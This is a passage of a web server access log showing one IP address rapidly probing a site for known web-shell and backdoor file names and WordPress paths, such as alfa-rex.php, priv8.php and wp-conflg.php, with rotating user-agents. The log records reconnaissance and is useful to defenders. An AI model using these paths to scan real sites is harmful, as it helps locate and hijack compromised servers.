Firefox/76.0" 194.5.82.85 - - [20/Dec/2025:15:25:16 -0500] "GET /wp-content/themes/admin.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 194.5.82.85 - - [20/Dec/2025:15:25:17 -0500] "GET /wp-admin/js/widgets/about.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 194.5.82.85 - - [20/Dec/2025:15:25:17 -0500] "GET /wp-admin/install.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:18 -0500] "GET /gawean.PhP7 HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0" 194.5.82.85 - - [20/Dec/2025:15:25:19 -0500] "GET /wp-config-sample.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:19 -0500] "GET /wp-content/themes/tflow/as.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 194.5.82.85 - - [20/Dec/2025:15:25:19 -0500] "GET /wp-admin/css/colors/coffee/alfa-rex.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:19 -0500] "GET /jga.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 194.5.82.85 - - [20/Dec/2025:15:25:20 -0500] "GET /filemanager.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:20 -0500] "GET /wp-includes/images/chosen.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0" 194.5.82.85 - - [20/Dec/2025:15:25:20 -0500] "GET /okxh.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:21 -0500] "GET /j.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 194.5.82.85 - - [20/Dec/2025:15:25:21 -0500] "GET /wp-includes/pomo/bru.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:21 -0500] "GET /wp-user.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:25:22 -0500] "GET /error.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 194.5.82.85 - - [20/Dec/2025:15:25:22 -0500] "GET /wp-content/uploads/about.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:23 -0500] "GET /wp-content/plugins/wordpresss3cll/includes.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:23 -0500] "GET /wp-includes/theme-compat/wp-conflg.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:24 -0500] "GET /wp-admin/images/moon.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:24 -0500] "GET /cgi-bin/about.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:25:25 -0500] "GET /e.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" 194.5.82.85 - - [20/Dec/2025:15:25:25 -0500] "GET /wp-includes/PHPMailer/admin.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 194.5.82.85 - - [20/Dec/2025:15:25:26 -0500] "GET /wp-content/install.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:26 -0500] "GET /wp-content/plugins/mainhosting/default.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:19 -0500] "GET /wp-includes/customize/autoload_classmap.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:20 -0500] "GET /xy.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" 194.5.82.85 - - [20/Dec/2025:15:25:20 -0500] "GET /.well-known/pki-validation/xl2023.php HTTP/1.1" 302 771 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 194.5.82.85 - - [20/Dec/2025:15:25:21 -0500] "GET /wp-includes/blocks/tag-cloud/about.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:21 -0500] "GET /.well-known/acme-challenge/muse.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:22 -0500] "GET /gelay.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:22 -0500] "GET /epinyins.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0" 194.5.82.85 - - [20/Dec/2025:15:25:22 -0500] "GET /images/class-config.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:23 -0500] "GET /root.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:23 -0500] "GET /chosen/function.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0" 194.5.82.85 - - [20/Dec/2025:15:25:23 -0500] "GET /bolt.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:25:24 -0500] "GET /wp-content/plugin.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:24 -0500] "GET /wp-admin/radio.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:25:24 -0500] "GET /byp.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:25 -0500] "GET /wp-includes/images/smilies/about.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:25:25 -0500] "GET /wp-includes/PHPMailer/PHPMailer.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:25 -0500] "GET /wp-includes/js/jcrop/Jcrop.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:26 -0500] "GET /9.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 194.5.82.85 - - [20/Dec/2025:15:25:26 -0500] "GET /wp-content/themes/twentytwenty/404.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:27 -0500] "GET /wp-content/plugins/core-plugin/include.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:26 -0500] "GET /xmlrpc.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:27 -0500] "GET /wp-admin/images/Mhbgf.php/wp-admin/images/Mhbgf.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:27 -0500] "GET /wp-includes/mah.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:28 -0500] "GET /wp-content/themes/tflow/up.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0" 194.5.82.85 - - [20/Dec/2025:15:25:28 -0500] "GET /layout.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:29 -0500] "GET /admin.php?attempt=1 HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:29 -0500] "GET /ioxi-rex3.php7 HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:29 -0500] "GET /wp-content/themes/alera/alpha.php?u?u HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:29 -0500] "GET /wp-content/plugins/erinyani/gebase.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:30 -0500] "GET /wp-includes/ID3/ini_user-info.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:30 -0500] "GET /.well-known/pki-validation/about.php HTTP/1.1" 302 771 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 194.5.82.85 - - [20/Dec/2025:15:25:30 -0500] "GET /fm.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:30 -0500] "GET /wp-admin/user/about.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:31 -0500] "GET /ioxi-rex5.php7 HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:32 -0500] "GET /.well-known/pki-validation/cloud.php HTTP/1.1" 302 771 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:25:33 -0500] "GET /ss.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:33 -0500] "GET /shx.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:33 -0500] "GET /priv8.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:33 -0500] "GET /wp-blog-header.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:25:27 -0500] "GET /wsa.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0" 194.5.82.85 - - [20/Dec/2025:15:25:27 -0500] "GET /fie.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0" 194.5.82.85 - - [20/Dec/2025:15:25:28 -0500] "GET /wp-includes/Requests/src/HookManager.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:28 -0500] "GET /wp-content/plugins/shell/noimg.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:28 -0500] "GET /wp-includes/block-supports/chosen.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:29 -0500] "GET /wp-includes/assets/admin.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:30 -0500] "GET /wp-setup.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:31 -0500] "GET /wp-includes/js/500.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0" 194.5.82.85 - - [20/Dec/2025:15:25:31 -0500] "GET /kly1.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0" 194.5.82.85 - - [20/Dec/2025:15:25:31 -0500] "GET /network.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:31 -0500] "GET /13.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:25:32 -0500] "GET /wp-admin/admin-wolf.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:25:32 -0500] "GET /wp-includes/admin.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:32 -0500] "GET /.well-known/acme-challenge/iR7SzrsOUEP.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:25:32 -0500] "GET /ecoraiderusa.com/cong.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:33 -0500] "GET /wp-content.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:34 -0500] "GET /wp-includes/ID3/user-info.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 194.5.82.85 - - [20/Dec/2025:15:25:34 -0500] "GET /browse.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 194.5.82.85 - - [20/Dec/2025:15:25:34 -0500] "GET /.well-known/acme-challenge/about.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; rv:11.0) like Gecko" 194.5.82.85 - - [20/Dec/2025:15:25:34 -0500] "GET /n.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 194.5.82.85 - - [20/Dec/2025:15:25:34 -0500] "GET /wp-admin/users.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:35 -0500] "GET /up4.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0" 194.5.82.85 - - [20/Dec/2025:15:25:35 -0500] "GET /wp-includes/Requests/src/Utility/about.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 194.5.82.85 - - [20/Dec/2025:15:25:35 -0500] "GET /sx.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 194.5.82.85 - - [20/Dec/2025:15:25:35 -0500] "GET /wp-includes/Text/wp-conflg.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:36 -0500] "GET /wp-includes/Text/Diff/Engine/about.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:36 -0500] "GET /wp-admin/setup-config.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:25:37 -0500] "GET /assets/atomlib.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 194.5.82.85 - - [20/Dec/2025:15:25:37 -0500] "GET /.well-known/pki-validation/afnew.php HTTP/1.1" 302 771 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:37 -0500] "GET /goods.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:38 -0500] "GET /wp-includes/pomo/wp-conflg.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:25:38 -0500] "GET /wp-class.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; rv:11.0) like Gecko" 194.5.82.85 - - [20/Dec/2025:15:25:39 -0500] "GET /ds.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:25:39 -0500] "GET /randkeyword.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:25:39 -0500] "GET /file.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:40 -0500] "GET /wb.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:25:40 -0500] "GET /sim.php/wp-includes/certificates/plugins.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:25:40 -0500] "GET /wp-admin/admin.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:41 -0500] "GET /wp-includes/ID3/about.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0" 194.5.82.85 - - [20/Dec/2025:15:25:41 -0500] "GET /wp-content/uploads/autoload_classmap.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 194.5.82.85 - - [20/Dec/2025:15:25:35 -0500] "GET /.bod/.ll/ss.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:25:36 -0500] "GET /zz.php/wp-includes/wp-includes_function.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:36 -0500] "GET /wp-includes/pomo/wp-conflg.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:36 -0500] "GET /wp-includes/SimplePie/Registry.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 194.5.82.85 - - [20/Dec/2025:15:25:37 -0500] "GET /wp-content/banners/about.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:25:37 -0500] "GET /wp-content/plugins/ubh/up.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:38 -0500] "GET /2.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0" 194.5.82.85 - - [20/Dec/2025:15:25:38 -0500] "GET /wp-includes/autoload_classmap.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:38 -0500] "GET /wp-content/themes/deeto/login.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 194.5.82.85 - - [20/Dec/2025:15:25:39 -0500] "GET /wp-admin/network/chosen.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 